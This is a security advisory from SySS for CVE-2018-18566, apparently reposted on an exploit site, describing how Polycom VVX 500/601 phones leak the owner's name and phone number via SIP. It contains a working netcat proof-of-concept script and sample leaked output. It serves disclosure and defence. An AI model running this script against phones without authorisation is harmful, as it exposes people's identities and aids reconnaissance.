Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability

Product:                   VVX 500 / VVX 601
Manufacturer:              Polycom
Affected Version(s):       <= 5.8.0.12848
Tested Version(s):         5.4.0.10182, 5.8.0.12848
Vulnerability Type:        Information Exposure (CWE-200)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2018-08-29
Solution Date:             20??-??-??
Public Disclosure:         2018-10-23
CVE Reference:        CVE-2018-18566
Authors of Advisory:       Micha Borrmann (SySS GmbH)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

If a Polycom VVX 500/601 [1] is used with an on-premise installation
with Skype for Business, the phone leaks the configured phone number
and the name to unauthorized clients via SIP.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The phone has a SIP service running by default on TCP port 5060. This
service can be abused to leak information about the configuration of
the phone.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Script getdatafrompolycom.sh

#!/bin/sh
# Micha Borrmann <[email protected]>

OWNIP=192.168.100.102

if [ -z "$1" ] 
then
    echo "Please enter an IPv4 address as target"
    exit
else
    TARGET=$1    
fi

echo 'OPTIONS sip:dummy SIP/2.0
Via: SIP/2.0/TCP '$OWNIP':5060
To: <sip:'$OWNIP':5060>
From: <sip:127.0.0.1:5060>
Call-ID: 1
CSeq: 1 OPTIONS
Contact: <sip:127.0.0.1:5060>
Accept: application/sdp
Content-Length: 0
' | recode ..ibmpc | netcat -w 1 $TARGET 5060

Start the script against a phone and see the result:

$ ./getpolycom.sh 192.168.100.101
SIP/2.0 200 OK
Via: SIP/2.0/TCP 192.168.100.102:5060
From: <sip:127.0.0.1:5060>
To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE
CSeq: 1 OPTIONS
Call-ID: 1
Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd>
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER
Supported: replaces,100rel
User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848
Accept-Language: en
P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234>
Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml
Accept-Encoding: identity
Supported: 100rel,replaces,norefersub,sdp-anat
Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001"
Content-Length: 0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install the new firmware which has disabled the SIP service by default.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2018-08-13: Detection of the vulnerability
2018-08-29: Vulnerability reported to manufacturer
2018-10-22: CVE number assigned
2018-10-23: Public release of the security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:
[1] Product web sites for the phones
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html
    https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html
[2] SySS Security Advisory SYSS-2018-028
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

#  0day.today [2018-10-25]  #